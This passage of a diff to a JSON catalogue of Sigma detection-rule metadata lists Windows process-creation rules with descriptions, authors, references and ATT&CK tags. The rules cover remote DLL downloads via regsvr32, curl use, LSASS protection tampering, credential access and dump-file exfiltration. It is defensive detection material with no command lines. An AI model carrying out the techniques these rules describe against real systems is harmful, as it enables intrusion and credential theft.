+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gup_download.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c",
+ "value": "Download Files Using Notepad++ GUP Utility"
+ },
+ {
+ "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/12/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_powershell_token_obfuscation.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/danielbohannon/Invoke-Obfuscation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_token_obfuscation.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1027.009"
+ ]
+ },
+ "uuid": "deb9b646-a508-44ee-b7c9-d8965921c6b6",
+ "value": "Powershell Token Obfuscation - Process Creation"
+ },
+ {
+ "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/13",
+ "falsepositive": [
+ "Legitimate usage of office automation via scripting"
+ ],
+ "filename": "proc_creation_win_office_svchost_child.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic",
+ "https://github.com/med0x2e/vba2clr",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml"
 ],
 "tags": [
 "attack.execution",
 "attack.defense_evasion"
 ]
 },
- "uuid": "868955d9-697e-45d4-a3da-360cefd7c216",
- "value": "Office Directory Traversal CommandLine"
+ "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28",
+ "value": "Svchost Spawning Office Application"
+ },
+ {
+ "description": "Detects the use of CleanWipe a tool usually used to delete Symantec antivirus.",
+ "meta": {
+ "author": "Nasreddine Bencherchali @nas_bench",
+ "creation_date": "2021/12/18",
+ "falsepositive": [
+ "Legitimate administrative use (Should be investigated either way)"
+ ],
+ "filename": "proc_creation_win_cleanwipe.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/CleanWipe",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cleanwipe.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.001"
+ ]
+ },
+ "uuid": "f44800ac-38ec-471f-936e-3fa7d9c53100",
+ "value": "CleanWipe Usage"
+ },
+ {
+ "description": "The Devtoolslauncher.exe executes other binary",
+ "meta": {
+ "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)",
+ "creation_date": "2019/10/12",
+ "falsepositive": [
+ "Legitimate use of devtoolslauncher.exe by legitimate user"
+ ],
+ "filename": "proc_creation_win_susp_devtoolslauncher.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/",
+ "https://twitter.com/_felamos/status/1179811992841797632",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_devtoolslauncher.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1218"
+ ]
+ },
+ "uuid": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6",
+ "value": "Devtoolslauncher.exe Executes Specified Binary"
+ },
+ {
+ "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2019/02/21",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_apt_bear_activity_gtr19.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_bear_activity_gtr19.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1552.001",
+ "attack.t1003.003"
+ ]
+ },
+ "uuid": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee",
+ "value": "Judgement Panda Credential Access Activity"
+ },
+ {
+ "description": "Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files.",
+ "meta": {
+ "author": "Eli Salem, Sander Wiebing, oscd.community",
+ "creation_date": "2020/10/08",
+ "falsepositive": [
+ "Legitimate modification of keys"
+ ],
+ "filename": "proc_creation_win_regini.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/regini",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regini/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regini.yml"
+ ],
+ "tags": [
+ "attack.t1112",
+ "attack.defense_evasion"
+ ]
+ },
+ "uuid": "5f60740a-f57b-4e76-82a1-15b6ff2cb134",
+ "value": "Modifies the Registry From a File"
+ },
+ {
+ "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/09/27",
+ "falsepositive": [
+ "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally"
+ ],
+ "filename": "proc_creation_win_susp_7zip_dmp.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/09/26/bumblebee-round-two/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1560.001"
+ ]
+ },
+ "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7",
+ "value": "7Zip Compressing Dump Files"
+ },
+ {
+ "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns",
+ "meta": {
+ "author": "Florian Roth (rule), @blu3_team (idea)",
+ "creation_date": "2019/06/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_double_extension.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html",
+ "https://twitter.com/blackorbird/status/1140519090961825792",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_double_extension.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1566.001"
+ ]
+ },
+ "uuid": "1cdd9a09-06c9-4769-99ff-626e2b3991b8",
+ "value": "Suspicious Double Extension"
+ },
+ {
+ "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2020/03/25",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_exploit_cve_2020_10189.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224",
+ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.t1190",
+ "attack.execution",
+ "attack.t1059.001",
+ "attack.t1059.003",
+ "attack.s0190",
+ "cve.2020.10189"
+ ]
+ },
+ "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7",
+ "value": "Exploited CVE-2020-10189 Zoho ManageEngine"
+ },
+ {
+ "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/09/09",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_import_cert_susp_locations.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/",
+ "https://docs.microsoft.com/en-us/powershell/module/pki/import-certificate?view=windowsserver2022-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_import_cert_susp_locations.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1553.004"
+ ]
+ },
+ "uuid": "5f6a601c-2ecb-498b-9c33-660362323afa",
+ "value": "Root Certificate Installed From Susp Locations"
+ },
+ {
+ "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/07/14",
+ "falsepositive": [
+ "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution"
+ ],
+ "filename": "proc_creation_win_susp_servu_process_pattern.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml"
+ ],
+ "tags": [
+ "attack.credential_access",
+ "attack.t1555",
+ "cve.2021.35211"
+ ]
+ },
+ "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf",
+ "value": "Suspicious Serv-U Process Pattern"
+ },
+ {
+ "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/12/02",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_wsudo_susp_execution.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/M2Team/Privexec/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.privilege_escalation",
+ "attack.t1059"
+ ]
+ },
+ "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891",
+ "value": "Wsudo Suspicious Execution"
 },
 {
 "description": "Office application called wmic to proxye execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).",
@@ -43910,157 +37129,1532 @@
 "value": "Office Processes Proxy Execution Through WMIC"
 },
 {
- "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Word, Excel, Powerpoint, Publisher and Visio",
+ "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN",
 "meta": {
- "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team",
- "creation_date": "2018/04/06",
+ "author": "Florian Roth",
+ "creation_date": "2022/01/11",
 "falsepositive": [
- "Unknown"
+ "FQDNs that start with a number"
 ],
- "filename": "proc_creation_win_office_shell.yml",
+ "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
- "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml"
+ "https://twitter.com/tccontre18/status/1480950986650832903",
+ "https://twitter.com/mrd0x/status/1461041276514623491c19-ps",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml"
 ],
 "tags": [
- "attack.execution",
- "attack.t1204.002"
+ "attack.defense_evasion",
+ "attack.t1218.010"
 ]
 },
- "uuid": "438025f9-5856-4663-83f7-52f878a70a50",
- "value": "Microsoft Office Product Spawning Windows Shell"
+ "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8",
+ "value": "Suspicious Regsvr32 HTTP IP Pattern"
 },
 {
- "description": "Initial execution of malicious document calls wmic to execute the file with regsvr32",
+ "description": "Detects a curl process start on Windows, which indicates a file download from a remote location or a simple web request to a remote server",
 "meta": {
- "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)",
- "creation_date": "2021/08/23",
+ "author": "Florian Roth",
+ "creation_date": "2022/07/05",
+ "falsepositive": [
+ "Scripts created by developers and admins",
+ "Administrative activity"
+ ],
+ "filename": "proc_creation_win_curl_download.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://web.archive.org/web/20200128160046/https://twitter.com/reegun21/status/1222093798009790464",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_download.yml"
+ ],
+ "tags": [
+ "attack.command_and_control",
+ "attack.t1105"
+ ]
+ },
+ "uuid": "bbeaed61-1990-4773-bf57-b81dbad7db2d",
+ "value": "Curl Usage on Windows"
+ },
+ {
+ "description": "Detects PowerShell Strings applied to rundll as seen in PowerShdll.dll",
+ "meta": {
+ "author": "Markus Neis",
+ "creation_date": "2018/08/25",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "proc_creation_win_office_spawning_wmi_commandline.yml",
+ "filename": "proc_creation_win_powershell_dll_execution.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawning_wmi_commandline.yml"
+ "https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml"
 ],
 "tags": [
- "attack.t1204.002",
- "attack.t1047",
- "attack.t1218.010",
- "attack.execution",
- "attack.defense_evasion"
+ "attack.defense_evasion",
+ "attack.t1218.011"
 ]
 },
- "uuid": "04f5363a-6bca-42ff-be70-0d28bf629ead",
- "value": "Office Applications Spawning Wmi Cli Alternate"
+ "uuid": "6812a10b-60ea-420c-832f-dfcc33b646ba",
+ "value": "Detection of PowerShell Execution via DLL"
 },
 {
- "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio",
+ "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe",
 "meta": {
- "author": "Jason Lynch",
- "creation_date": "2019/04/02",
+ "author": "Maxime Thiebaut (@0xThiebaut)",
+ "creation_date": "2021/10/21",
 "falsepositive": [
- "Unknown"
+ "Legitimate usage of the uncommon Windows Work Folders feature."
 ],
- "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml",
+ "filename": "proc_creation_win_susp_workfolders.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c",
- "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml"
+ "https://twitter.com/elliotkillick/status/1449812843772227588",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml"
 ],
 "tags": [
- "attack.execution",
- "attack.t1204.002",
- "attack.g0046",
- "car.2013-05-002"
+ "attack.defense_evasion",
+ "attack.t1218"
 ]
 },
- "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc",
- "value": "MS Office Product Spawning Exe in User Dir"
+ "uuid": "0bbc6369-43e3-453d-9944-cae58821c173",
+ "value": "Execution via WorkFolders.exe"
 },
 {
- "description": "Detects svchost process spawning an instance of an office application. This happens when the initial word application create an instance of one of the office COM objects such as 'Word.Application', 'Excel.Application'...etc. This can be used by malicious actor to create a malicious office document with macros on the fly. (See vba2clr project in reference)",
+ "description": "Detects suspicious sub processes spawned by PowerShell",
 "meta": {
- "author": "Nasreddine Bencherchali",
- "creation_date": "2022/10/13",
+ "author": "Florian Roth, Tim Shelton",
+ "creation_date": "2022/04/26",
 "falsepositive": [
- "Legitimate usage of office automation via scripting"
+ "Unknown"
 ],
- "filename": "proc_creation_win_office_svchost_child.yml",
+ "filename": "proc_creation_win_susp_powershell_sub_processes.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/ankit_anubhav/status/1518835408502620162",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647",
+ "value": "Suspicious PowerShell Sub Processes"
+ },
+ {
+ "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.",
+ "meta": {
+ "author": "oscd.community, @redcanary, Zach Stanford @svch0st",
+ "creation_date": "2020/10/10",
+ "falsepositive": [
+ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"
+ ],
+ "filename": "proc_creation_win_root_certificate_installed.yml",
 "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/previous-versions/office/troubleshoot/office-developer/automate-word-create-file-using-visual-basic",
- "https://github.com/med0x2e/vba2clr",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_svchost_child.yml"
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_root_certificate_installed.yml"
 ],
 "tags": [
- "attack.execution",
- "attack.defense_evasion"
+ "attack.defense_evasion",
+ "attack.t1553.004"
 ]
 },
- "uuid": "9bdaf1e9-fdef-443b-8081-4341b74a7e28",
- "value": "Svchost Spawning Office Application"
+ "uuid": "46591fae-7a4c-46ea-aec3-dff5e6d785dc",
+ "value": "Root Certificate Installed"
 },
 {
- "description": "Detects a Windows command and scripting interpreter executable started from Microsoft Outlook",
+ "description": "Detects net use command combo which executes files from WebDAV server; seen in malicious LNK files",
 "meta": {
- "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team",
- "creation_date": "2022/02/28",
+ "author": "pH-T",
+ "creation_date": "2022/09/01",
 "falsepositive": [
 "Unknown"
 ],
- "filename": "proc_creation_win_outlook_shell.yml",
+ "filename": "proc_creation_win_susp_net_use.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
- "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_outlook_shell.yml"
+ "https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior",
+ "https://twitter.com/ShadowChasing1/status/1552595370961944576",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_net_use.yml"
 ],
 "tags": [
 "attack.execution",
- "attack.t1204.002"
+ "attack.t1059.001"
 ]
 },
- "uuid": "208748f7-881d-47ac-a29c-07ea84bf691d",
- "value": "Microsoft Outlook Product Spawning Windows Shell"
+ "uuid": "f0507c0f-a3a2-40f5-acc6-7f543c334993",
+ "value": "Suspicious Net Use Command Combo"
 },
 {
- "description": "Detects suspicious execution of \"PDQDeployRunner\" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines",
+ "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2017/09/15",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_exploit_cve_2017_8759.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100",
+ "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1203",
+ "attack.t1204.002",
+ "attack.initial_access",
+ "attack.t1566.001"
+ ]
+ },
+ "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905",
+ "value": "Exploit for CVE-2017-8759"
+ },
+ {
+ "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'",
 "meta": {
 "author": "Nasreddine Bencherchali",
- "creation_date": "2022/07/22",
+ "creation_date": "2022/08/19",
 "falsepositive": [
- "Legitimate use of the PDQDeploy tool to execute these commands"
+ "Unknown"
 ],
- "filename": "proc_creation_win_pdqdeploy_runner_susp_children.yml",
+ "filename": "proc_creation_win_lolbin_customshellhost.yml",
 "level": "medium",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/malmoeb/status/1550483085472432128",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml"
+ "https://github.com/LOLBAS-Project/LOLBAS/pull/180",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1216"
+ ]
+ },
+ "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d",
+ "value": "Suspicious CustomShellHost Execution"
+ },
+ {
+ "description": "Detects reg command lines that disables PPL on the LSA process",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/03/22",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_reg_lsass_ppl.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsass_ppl.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1562.010"
+ ]
+ },
+ "uuid": "8c0eca51-0f88-4db2-9183-fdfb10c703f9",
+ "value": "Registry Disabling LSASS PPL"
+ },
+ {
+ "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2022/07/21",
+ "falsepositive": [
+ "Legitimate administrative tasks"
+ ],
+ "filename": "proc_creation_win_susp_psexesvc_as_system.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml"
 ],
 "tags": [
 "attack.execution"
 ]
 },
- "uuid": "12b8e9f5-96b2-41e1-9a42-8c6779a5c184",
- "value": "Suspicious Execution Of PDQDeployRunner"
+ "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94",
+ "value": "PsExec Service Execution as LOCAL SYSTEM"
+ },
+ {
+ "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks. In order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.",
+ "meta": {
+ "author": "Sreeman",
+ "creation_date": "2020/09/29",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_abusing_windows_telemetry_for_persistence.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_abusing_windows_telemetry_for_persistence.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.t1053.005"
+ ]
+ },
+ "uuid": "f548a603-c9f2-4c89-b511-b089f7e94549",
+ "value": "Potential Persistence Execution Via Microsoft Compatibility Appraiser"
+ },
+ {
+ "description": "Detects base64 encoded .NET reflective loading of Assembly",
+ "meta": {
+ "author": "Christian Burkard, pH-T",
+ "creation_date": "2022/03/01",
+ "falsepositive": [
+ "Unlikely"
+ 
], + "filename": "proc_creation_win_base64_reflective_assembly_load.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_base64_reflective_assembly_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027", + "attack.t1620" + ] + }, + "uuid": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", + "value": "Base64 Encoded Reflective Assembly Load" + }, + { + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate processes that run at logon. Filter according to your environment" + ], + "filename": "proc_creation_win_susp_schtasks_schedule_type.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtasks_schedule_type.yml" + ], + "tags": [ + "attack.execution", + "attack.t1053.005" + ] + }, + "uuid": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "value": "Suspicious Schtasks Schedule Types" + }, + { + "description": "Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit.", + "meta": { + 
"author": "frack113", + "creation_date": "2022/01/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_char_in_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_char_in_cmd.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "e0552b19-5a83-4222-b141-b36184bb8d79", + "value": "Obfuscated Command Line Using Special Unicode Characters" + }, + { + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_bginfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", + "value": "Application Whitelisting Bypass via Bginfo" + }, + { + "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum 